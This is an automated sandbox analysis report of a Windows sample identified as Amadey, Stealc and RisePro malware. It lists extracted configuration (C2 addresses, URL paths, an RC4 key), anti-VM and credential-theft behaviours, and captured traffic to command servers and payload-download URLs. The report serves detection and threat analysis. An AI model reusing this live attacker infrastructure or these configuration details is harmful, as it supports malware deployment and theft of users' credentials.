Analysis

  • max time kernel
    150s
  • max time network
    150s
  • platform
    windows11-21h2_x64
  • resource
    win11-20240611-en
  • resource tags

    arch:x64arch:x86image:win11-20240611-enlocale:en-usos:windows11-21h2-x64system
  • submitted
    25/06/2024, 08:50 UTC

General

  • Target

    4874b19cd003189b379863746c23b357f303f7405578e0742477035b9dcc711f.exe

  • Size

    1.9MB

  • MD5

    6b9fac405b3c007a076727b08988b8cb

  • SHA1

    2928ea6f1c9f41549246149f17112b6624acbb5c

  • SHA256

    4874b19cd003189b379863746c23b357f303f7405578e0742477035b9dcc711f

  • SHA512

    0ce0516e4241430b79547a398ade80f13ef74bebf46c95ce8922ddfff9865dc94b2f9c5de6d476289f450d245e752d8d79887c6320fc474fcb786d2076e43cf5

  • SSDEEP

    49152:pj9QLIKLr59rhb/9ICYwuxJCA4lDhcuzb70D:phQH9ZIC4/DacOb70

Malware Config

Extracted

Family

amadey

Version

4.21

Botnet

0e6740

C2

http://147.45.47.155

Attributes
  • install_dir

    9217037dc9

  • install_file

    explortu.exe

  • strings_key

    8e894a8a4a3d0da8924003a561cfb244

  • url_paths

    /ku4Nor9/index.php

rc4.plain
1
006700e5a2ab05704bbb0c589b88924d

Extracted

Family

stealc

Botnet

default

C2

http://85.28.47.4

Attributes
  • url_path

    /920475a59bac849d.php

Signatures

  • Amadey

    Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.

  • RisePro

    RisePro stealer is an infostealer distributed by PrivateLoader.

  • Stealc

    Stealc is an infostealer written in C++.

  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 7 IoCs
  • Downloads MZ/PE file
  • Checks BIOS information in registry 2 TTPs 14 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Executes dropped EXE 7 IoCs
  • Identifies Wine through registry keys 2 TTPs 7 IoCs

    Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.

  • Loads dropped DLL 2 IoCs
  • Reads data files stored by FTP clients 2 TTPs

    Tries to access configuration files associated with programs like FileZilla.

  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 1 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • AutoIT Executable 3 IoCs

    AutoIT scripts compiled to PE executables.

  • Suspicious use of NtSetInformationThreadHideFromDebugger 9 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Drops file in Windows directory 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Checks processor information in registry 2 TTPs 2 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Modifies data under HKEY_USERS 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 22 IoCs
  • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 3 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 63 IoCs
  • Suspicious use of SendNotifyMessage 48 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\4874b19cd003189b379863746c23b357f303f7405578e0742477035b9dcc711f.exe
    "C:\Users\Admin\AppData\Local\Temp\4874b19cd003189b379863746c23b357f303f7405578e0742477035b9dcc711f.exe"
    1⤵
    • Identifies VirtualBox via ACPI registry values (likely anti-VM)
    • Checks BIOS information in registry
    • Identifies Wine through registry keys
    • Suspicious use of NtSetInformationThreadHideFromDebugger
    • Drops file in Windows directory
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of WriteProcessMemory
    PID:3152
    • C:\Users\Admin\AppData\Local\Temp\9217037dc9\explortu.exe
      "C:\Users\Admin\AppData\Local\Temp\9217037dc9\explortu.exe"
      2⤵
      • Identifies VirtualBox via ACPI registry values (likely anti-VM)
      • Checks BIOS information in registry
      • Executes dropped EXE
      • Identifies Wine through registry keys
      • Adds Run key to start application
      • Suspicious use of NtSetInformationThreadHideFromDebugger
      • Suspicious use of SetThreadContext
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of WriteProcessMemory
      PID:3296
      • C:\Users\Admin\AppData\Local\Temp\9217037dc9\explortu.exe
        "C:\Users\Admin\AppData\Local\Temp\9217037dc9\explortu.exe"
        3⤵
        • Identifies VirtualBox via ACPI registry values (likely anti-VM)
        • Checks BIOS information in registry
        • Executes dropped EXE
        • Identifies Wine through registry keys
        • Suspicious use of NtSetInformationThreadHideFromDebugger
        • Suspicious behavior: EnumeratesProcesses
        PID:4024
      • C:\Users\Admin\AppData\Local\Temp\1000016001\222be12d3f.exe
        "C:\Users\Admin\AppData\Local\Temp\1000016001\222be12d3f.exe"
        3⤵
        • Identifies VirtualBox via ACPI registry values (likely anti-VM)
        • Checks BIOS information in registry
        • Executes dropped EXE
        • Identifies Wine through registry keys
        • Suspicious use of NtSetInformationThreadHideFromDebugger
        • Suspicious behavior: EnumeratesProcesses
        PID:2504
      • C:\Users\Admin\AppData\Local\Temp\1000017001\41c790c7b2.exe
        "C:\Users\Admin\AppData\Local\Temp\1000017001\41c790c7b2.exe"
        3⤵
        • Identifies VirtualBox via ACPI registry values (likely anti-VM)
        • Checks BIOS information in registry
        • Executes dropped EXE
        • Identifies Wine through registry keys
        • Suspicious use of NtSetInformationThreadHideFromDebugger
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of FindShellTrayWindow
        • Suspicious use of SendNotifyMessage
        • Suspicious use of WriteProcessMemory
        PID:4612
        • C:\Program Files\Google\Chrome\Application\chrome.exe
          "C:\Program Files\Google\Chrome\Application\chrome.exe" https://www.youtube.com/account
          4⤵
          • Enumerates system info in registry
          • Modifies data under HKEY_USERS
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of FindShellTrayWindow
          • Suspicious use of SendNotifyMessage
          • Suspicious use of WriteProcessMemory
          PID:2696
          • C:\Program Files\Google\Chrome\Application\chrome.exe
            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=110.0.5481.104 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffb30d2ab58,0x7ffb30d2ab68,0x7ffb30d2ab78
            5⤵
              PID:2964
            • C:\Program Files\Google\Chrome\Application\chrome.exe
              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1624 --field-trial-handle=1804,i,15526287612262146994,3022085125827364013,131072 /prefetch:2
              5⤵
                PID:1628
              • C:\Program Files\Google\Chrome\Application\chrome.exe
                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2088 --field-trial-handle=1804,i,15526287612262146994,3022085125827364013,131072 /prefetch:8
                5⤵
                  PID:3424
                • C:\Program Files\Google\Chrome\Application\chrome.exe
                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=2112 --field-trial-handle=1804,i,15526287612262146994,3022085125827364013,131072 /prefetch:8
                  5⤵
                    PID:1500
                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=2912 --field-trial-handle=1804,i,15526287612262146994,3022085125827364013,131072 /prefetch:1
                    5⤵
                      PID:220
                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=2936 --field-trial-handle=1804,i,15526287612262146994,3022085125827364013,131072 /prefetch:1
                      5⤵
                        PID:4744
                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=3796 --field-trial-handle=1804,i,15526287612262146994,3022085125827364013,131072 /prefetch:1
                        5⤵
                          PID:1420
                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4348 --field-trial-handle=1804,i,15526287612262146994,3022085125827364013,131072 /prefetch:8
                          5⤵
                            PID:4628
                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4040 --field-trial-handle=1804,i,15526287612262146994,3022085125827364013,131072 /prefetch:8
                            5⤵
                              PID:1172
                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4680 --field-trial-handle=1804,i,15526287612262146994,3022085125827364013,131072 /prefetch:8
                              5⤵
                                PID:4016
                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.22000.1 --gpu-preferences=UAAAAAAAAADoAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAACQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2336 --field-trial-handle=1804,i,15526287612262146994,3022085125827364013,131072 /prefetch:2
                                5⤵
                                • Suspicious behavior: EnumeratesProcesses
                                PID:4744
                          • C:\Users\Admin\AppData\Local\Temp\1000020001\num.exe
                            "C:\Users\Admin\AppData\Local\Temp\1000020001\num.exe"
                            3⤵
                            • Executes dropped EXE
                            • Loads dropped DLL
                            • Suspicious use of NtSetInformationThreadHideFromDebugger
                            • Checks processor information in registry
                            • Suspicious behavior: EnumeratesProcesses
                            • Suspicious use of SetWindowsHookEx
                            PID:1904
                      • C:\Program Files\Google\Chrome\Application\110.0.5481.104\elevation_service.exe
                        "C:\Program Files\Google\Chrome\Application\110.0.5481.104\elevation_service.exe"
                        1⤵
                          PID:3184
                        • C:\Users\Admin\AppData\Local\Temp\9217037dc9\explortu.exe
                          C:\Users\Admin\AppData\Local\Temp\9217037dc9\explortu.exe
                          1⤵
                          • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                          • Checks BIOS information in registry
                          • Executes dropped EXE
                          • Identifies Wine through registry keys
                          • Suspicious use of NtSetInformationThreadHideFromDebugger
                          • Suspicious behavior: EnumeratesProcesses
                          PID:3152
                        • C:\Users\Admin\AppData\Local\Temp\9217037dc9\explortu.exe
                          C:\Users\Admin\AppData\Local\Temp\9217037dc9\explortu.exe
                          1⤵
                          • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                          • Checks BIOS information in registry
                          • Executes dropped EXE
                          • Identifies Wine through registry keys
                          • Suspicious use of NtSetInformationThreadHideFromDebugger
                          • Suspicious behavior: EnumeratesProcesses
                          PID:1564

                        Network

                        • flag-ru
                          POST
                          http://147.45.47.155/ku4Nor9/index.php
                          explortu.exe
                          Remote address:
                          147.45.47.155:80
                          Request
                          POST /ku4Nor9/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 147.45.47.155
                          Content-Length: 4
                          Cache-Control: no-cache
                          Response
                          HTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 25 Jun 2024 08:50:13 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Refresh: 0; url = Login.php
                        • flag-ru
                          POST
                          http://147.45.47.155/ku4Nor9/index.php
                          explortu.exe
                          Remote address:
                          147.45.47.155:80
                          Request
                          POST /ku4Nor9/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 147.45.47.155
                          Content-Length: 160
                          Cache-Control: no-cache
                          Response
                          HTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 25 Jun 2024 08:50:13 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                        • flag-ru
                          POST
                          http://147.45.47.155/ku4Nor9/index.php
                          explortu.exe
                          Remote address:
                          147.45.47.155:80
                          Request
                          POST /ku4Nor9/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 147.45.47.155
                          Content-Length: 31
                          Cache-Control: no-cache
                          Response
                          HTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 25 Jun 2024 08:50:17 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                        • flag-ru
                          POST
                          http://147.45.47.155/ku4Nor9/index.php
                          explortu.exe
                          Remote address:
                          147.45.47.155:80
                          Request
                          POST /ku4Nor9/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 147.45.47.155
                          Content-Length: 31
                          Cache-Control: no-cache
                          Response
                          HTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 25 Jun 2024 08:50:21 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                        • flag-ru
                          POST
                          http://147.45.47.155/ku4Nor9/index.php
                          explortu.exe
                          Remote address:
                          147.45.47.155:80
                          Request
                          POST /ku4Nor9/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 147.45.47.155
                          Content-Length: 31
                          Cache-Control: no-cache
                          Response
                          HTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 25 Jun 2024 08:50:24 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                        • flag-ru
                          POST
                          http://147.45.47.155/ku4Nor9/index.php
                          explortu.exe
                          Remote address:
                          147.45.47.155:80
                          Request
                          POST /ku4Nor9/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 147.45.47.155
                          Content-Length: 31
                          Cache-Control: no-cache
                          Response
                          HTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 25 Jun 2024 08:50:27 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                        • flag-de
                          GET
                          http://77.91.77.81/cost/sarra.exe
                          explortu.exe
                          Remote address:
                          77.91.77.81:80
                          Request
                          GET /cost/sarra.exe HTTP/1.1
                          Host: 77.91.77.81
                          Response
                          HTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 25 Jun 2024 08:50:14 GMT
                          Content-Type: application/octet-stream
                          Content-Length: 2441728
                          Last-Modified: Tue, 25 Jun 2024 08:35:43 GMT
                          Connection: keep-alive
                          ETag: "667a815f-254200"
                          Accept-Ranges: bytes
                        • flag-de
                          GET
                          http://77.91.77.81/cost/random.exe
                          explortu.exe
                          Remote address:
                          77.91.77.81:80
                          Request
                          GET /cost/random.exe HTTP/1.1
                          Host: 77.91.77.81
                          Response
                          HTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 25 Jun 2024 08:50:17 GMT
                          Content-Type: application/octet-stream
                          Content-Length: 2476544
                          Last-Modified: Tue, 25 Jun 2024 08:35:06 GMT
                          Connection: keep-alive
                          ETag: "667a813a-25ca00"
                          Accept-Ranges: bytes
                        • flag-de
                          GET
                          http://77.91.77.81/well/random.exe
                          explortu.exe
                          Remote address:
                          77.91.77.81:80
                          Request
                          GET /well/random.exe HTTP/1.1
                          Host: 77.91.77.81
                          Response
                          HTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 25 Jun 2024 08:50:21 GMT
                          Content-Type: application/octet-stream
                          Content-Length: 2426880
                          Last-Modified: Tue, 25 Jun 2024 08:37:09 GMT
                          Connection: keep-alive
                          ETag: "667a81b5-250800"
                          Accept-Ranges: bytes
                        • flag-de
                          GET
                          http://77.91.77.81/cost/num.exe
                          explortu.exe
                          Remote address:
                          77.91.77.81:80
                          Request
                          GET /cost/num.exe HTTP/1.1
                          Host: 77.91.77.81
                          Response
                          HTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 25 Jun 2024 08:50:25 GMT
                          Content-Type: application/octet-stream
                          Content-Length: 2515968
                          Last-Modified: Mon, 24 Jun 2024 23:38:39 GMT
                          Connection: keep-alive
                          ETag: "667a037f-266400"
                          Accept-Ranges: bytes
                        • flag-us
                          DNS
                          81.77.91.77.in-addr.arpa
                          Remote address:
                          8.8.8.8:53
                          Request
                          81.77.91.77.in-addr.arpa
                          IN PTR
                          Response
                        • flag-us
                          DNS
                          8.8.8.8.in-addr.arpa
                          Remote address:
                          8.8.8.8:53
                          Request
                          8.8.8.8.in-addr.arpa
                          IN PTR
                          Response
                          8.8.8.8.in-addr.arpa
                          IN PTR
                          dnsgoogle
                        • flag-us
                          DNS
                          www.googleapis.com
                          Remote address:
                          8.8.8.8:53
                          Request
                          www.googleapis.com
                          IN A
                          Response
                          www.googleapis.com
                          IN A
                          142.250.187.234
                          www.googleapis.com
                          IN A
                          142.250.187.202
                          www.googleapis.com
                          IN A
                          142.250.200.42
                          www.googleapis.com
                          IN A
                          172.217.169.74
                          www.googleapis.com
                          IN A
                          142.250.179.234
                          www.googleapis.com
                          IN A
                          172.217.16.234
                          www.googleapis.com
                          IN A
                          172.217.169.42
                          www.googleapis.com
                          IN A
                          142.250.178.10
                          www.googleapis.com
                          IN A
                          216.58.204.74
                          www.googleapis.com
                          IN A
                          216.58.201.106
                          www.googleapis.com
                          IN A
                          142.250.180.10
                          www.googleapis.com
                          IN A
                          216.58.212.234
                          www.googleapis.com
                          IN A
                          172.217.169.10
                          www.googleapis.com
                          IN A
                          142.250.200.10
                        • flag-us
                          DNS
                          234.187.250.142.in-addr.arpa
                          Remote address:
                          8.8.8.8:53
                          Request
                          234.187.250.142.in-addr.arpa
                          IN PTR
                          Response
                          234.187.250.142.in-addr.arpa
                          IN PTR
                          lhr25s34-in-f101e100net
                        • flag-us
                          DNS
                          consent.youtube.com
                          Remote address:
                          8.8.8.8:53
                          Request
                          consent.youtube.com
                          IN A
                          Response
                          consent.youtube.com
                          IN A
                          216.58.212.206
                        • flag-us
                          DNS
                          fonts.gstatic.com
                          Remote address:
                          8.8.8.8:53
                          Request
                          fonts.gstatic.com
                          IN A
                          Response
                          fonts.gstatic.com
                          IN A
                          216.58.201.99
                        • flag-us
                          DNS
                          195.212.58.216.in-addr.arpa
                          Remote address:
                          8.8.8.8:53
                          Request
                          195.212.58.216.in-addr.arpa
                          IN PTR
                          Response
                          195.212.58.216.in-addr.arpa
                          IN PTR
                          lhr25s27-in-f31e100net
                          195.212.58.216.in-addr.arpa
                          IN PTR
                          ams16s21-in-f195�H
                          195.212.58.216.in-addr.arpa
                          IN PTR
                          ams16s21-in-f3�H
                        • flag-us
                          DNS
                          196.187.250.142.in-addr.arpa
                          Remote address:
                          8.8.8.8:53
                          Request
                          196.187.250.142.in-addr.arpa
                          IN PTR
                          Response
                          196.187.250.142.in-addr.arpa
                          IN PTR
                          lhr25s33-in-f41e100net
                        • flag-us
                          DNS
                          play.google.com
                          Remote address:
                          8.8.8.8:53
                          Request
                          play.google.com
                          IN A
                          Response
                          play.google.com
                          IN A
                          172.217.169.46
                        • flag-us
                          DNS
                          nexusrules.officeapps.live.com
                          Remote address:
                          8.8.8.8:53
                          Request
                          nexusrules.officeapps.live.com
                          IN A
                          Response
                          nexusrules.officeapps.live.com
                          IN CNAME
                          prod.nexusrules.live.com.akadns.net
                          prod.nexusrules.live.com.akadns.net
                          IN A
                          52.111.236.22
                        • flag-us
                          DNS
                          155.47.45.147.in-addr.arpa
                          Remote address:
                          8.8.8.8:53
                          Request
                          155.47.45.147.in-addr.arpa
                          IN PTR
                          Response
                        • flag-us
                          DNS
                          www.youtube.com
                          Remote address:
                          8.8.8.8:53
                          Request
                          www.youtube.com
                          IN A
                          Response
                          www.youtube.com
                          IN CNAME
                          youtube-ui.l.google.com
                          youtube-ui.l.google.com
                          IN A
                          216.58.204.78
                          youtube-ui.l.google.com
                          IN A
                          216.58.212.238
                          youtube-ui.l.google.com
                          IN A
                          142.250.180.14
                          youtube-ui.l.google.com
                          IN A
                          142.250.178.14
                          youtube-ui.l.google.com
                          IN A
                          142.250.200.14
                          youtube-ui.l.google.com
                          IN A
                          172.217.16.238
                          youtube-ui.l.google.com
                          IN A
                          142.250.200.46
                          youtube-ui.l.google.com
                          IN A
                          216.58.212.206
                          youtube-ui.l.google.com
                          IN A
                          142.250.187.238
                          youtube-ui.l.google.com
                          IN A
                          216.58.201.110
                          youtube-ui.l.google.com
                          IN A
                          172.217.169.46
                          youtube-ui.l.google.com
                          IN A
                          142.250.187.206
                          youtube-ui.l.google.com
                          IN A
                          142.250.179.238
                        • flag-us
                          DNS
                          78.204.58.216.in-addr.arpa
                          Remote address:
                          8.8.8.8:53
                          Request
                          78.204.58.216.in-addr.arpa
                          IN PTR
                          Response
                          78.204.58.216.in-addr.arpa
                          IN PTR
                          lhr25s13-in-f781e100net
                          78.204.58.216.in-addr.arpa
                          IN PTR
                          lhr48s49-in-f14�H
                          78.204.58.216.in-addr.arpa
                          IN PTR
                          lhr25s13-in-f14�H
                        • flag-us
                          DNS
                          www.gstatic.com
                          Remote address:
                          8.8.8.8:53
                          Request
                          www.gstatic.com
                          IN A
                          Response
                          www.gstatic.com
                          IN A
                          216.58.212.195
                        • flag-us
                          DNS
                          www.google.com
                          Remote address:
                          8.8.8.8:53
                          Request
                          www.google.com
                          IN A
                          Response
                          www.google.com
                          IN A
                          142.250.187.196
                        • flag-us
                          DNS
                          74.204.58.216.in-addr.arpa
                          Remote address:
                          8.8.8.8:53
                          Request
                          74.204.58.216.in-addr.arpa
                          IN PTR
                          Response
                          74.204.58.216.in-addr.arpa
                          IN PTR
                          lhr25s13-in-f741e100net
                          74.204.58.216.in-addr.arpa
                          IN PTR
                          lhr25s13-in-f10�H
                          74.204.58.216.in-addr.arpa
                          IN PTR
                          lhr48s49-in-f10�H
                        • flag-us
                          DNS
                          clients2.google.com
                          Remote address:
                          8.8.8.8:53
                          Request
                          clients2.google.com
                          IN A
                          Response
                          clients2.google.com
                          IN CNAME
                          clients.l.google.com
                          clients.l.google.com
                          IN A
                          142.250.187.238
                        • flag-us
                          DNS
                          46.169.217.172.in-addr.arpa
                          Remote address:
                          8.8.8.8:53
                          Request
                          46.169.217.172.in-addr.arpa
                          IN PTR
                          Response
                          46.169.217.172.in-addr.arpa
                          IN PTR
                          lhr48s08-in-f141e100net
                        • flag-us
                          DNS
                          22.236.111.52.in-addr.arpa
                          Remote address:
                          8.8.8.8:53
                          Request
                          22.236.111.52.in-addr.arpa
                          IN PTR
                          Response
                        • flag-gb
                          GET
                          https://www.youtube.com/account
                          chrome.exe
                          Remote address:
                          216.58.204.78:443
                          Request
                          GET /account HTTP/2.0
                          host: www.youtube.com
                          sec-ch-ua: "Chromium";v="110", "Not A(Brand";v="24", "Google Chrome";v="110"
                          sec-ch-ua-mobile: ?0
                          sec-ch-ua-platform: "Windows"
                          upgrade-insecure-requests: 1
                          user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36
                          accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                          sec-ch-ua-arch: "x86"
                          sec-ch-ua-platform-version: "14.0.0"
                          sec-ch-ua-model: ""
                          sec-ch-ua-bitness: "64"
                          sec-ch-ua-wow64: ?0
                          sec-ch-ua-full-version-list: "Chromium";v="110.0.5481.104", "Not A(Brand";v="24.0.0.0", "Google Chrome";v="110.0.5481.104"
                          x-client-data: CLnrygE=
                          sec-fetch-site: none
                          sec-fetch-mode: navigate
                          sec-fetch-user: ?1
                          sec-fetch-dest: document
                          accept-encoding: gzip, deflate, br
                          accept-language: en-US,en;q=0.9
                        • flag-gb
                          GET
                          https://consent.youtube.com/m?continue=https%3A%2F%2Fwww.youtube.com%2Faccount%3Fcbrd%3D1&gl=GB&m=0&pc=yt&cm=2&hl=en&src=1
                          chrome.exe
                          Remote address:
                          216.58.212.206:443
                          Request
                          GET /m?continue=https%3A%2F%2Fwww.youtube.com%2Faccount%3Fcbrd%3D1&gl=GB&m=0&pc=yt&cm=2&hl=en&src=1 HTTP/2.0
                          host: consent.youtube.com
                          upgrade-insecure-requests: 1
                          user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36
                          accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                          sec-ch-ua: "Chromium";v="110", "Not A(Brand";v="24", "Google Chrome";v="110"
                          sec-ch-ua-mobile: ?0
                          sec-ch-ua-platform: "Windows"
                          sec-ch-ua-arch: "x86"
                          sec-ch-ua-platform-version: "14.0.0"
                          sec-ch-ua-model: ""
                          sec-ch-ua-bitness: "64"
                          sec-ch-ua-wow64: ?0
                          sec-ch-ua-full-version-list: "Chromium";v="110.0.5481.104", "Not A(Brand";v="24.0.0.0", "Google Chrome";v="110.0.5481.104"
                          x-client-data: CLnrygE=
                          sec-fetch-site: none
                          sec-fetch-mode: navigate
                          sec-fetch-user: ?1
                          sec-fetch-dest: document
                          accept-encoding: gzip, deflate, br
                          accept-language: en-US,en;q=0.9
                          cookie: SOCS=CAAaBgiAkeizBg
                          cookie: YSC=jWjamKsx8YQ
                          cookie: __Secure-YEC=CgtMQVNkdnVCalRhWSjSieqzBjIKCgJHQhIEGgAgZg%3D%3D
                          cookie: VISITOR_PRIVACY_METADATA=CgJHQhIEGgAgZg%3D%3D
                        • flag-gb
                          POST
                          https://consent.youtube.com/_/ConsentUi/browserinfo?f.sid=8961433167468703326&bl=boq_identityfrontenduiserver_20240617.06_p0&hl=en&gl=GB&_reqid=31832&rt=j
                          chrome.exe
                          Remote address:
                          216.58.212.206:443
                          Request
                          POST /_/ConsentUi/browserinfo?f.sid=8961433167468703326&bl=boq_identityfrontenduiserver_20240617.06_p0&hl=en&gl=GB&_reqid=31832&rt=j HTTP/2.0
                          host: consent.youtube.com
                          content-length: 117
                          sec-ch-ua: "Chromium";v="110", "Not A(Brand";v="24", "Google Chrome";v="110"
                          x-same-domain: 1
                          sec-ch-ua-mobile: ?0
                          user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36
                          sec-ch-ua-arch: "x86"
                          content-type: application/x-www-form-urlencoded;charset=UTF-8
                          sec-ch-ua-full-version: "110.0.5481.104"
                          sec-ch-ua-platform-version: "14.0.0"
                          sec-ch-ua-full-version-list: "Chromium";v="110.0.5481.104", "Not A(Brand";v="24.0.0.0", "Google Chrome";v="110.0.5481.104"
                          sec-ch-ua-bitness: "64"
                          sec-ch-ua-model:
                          sec-ch-ua-wow64: ?0
                          sec-ch-ua-platform: "Windows"
                          accept: */*
                          origin: https://consent.youtube.com
                          x-client-data: CLnrygE=
                          sec-fetch-site: same-origin
                          sec-fetch-mode: cors
                          sec-fetch-dest: empty
                          referer: https://consent.youtube.com/
                          accept-encoding: gzip, deflate, br
                          accept-language: en-US,en;q=0.9
                          cookie: SOCS=CAAaBgiAkeizBg
                          cookie: YSC=jWjamKsx8YQ
                          cookie: __Secure-YEC=CgtMQVNkdnVCalRhWSjSieqzBjIKCgJHQhIEGgAgZg%3D%3D
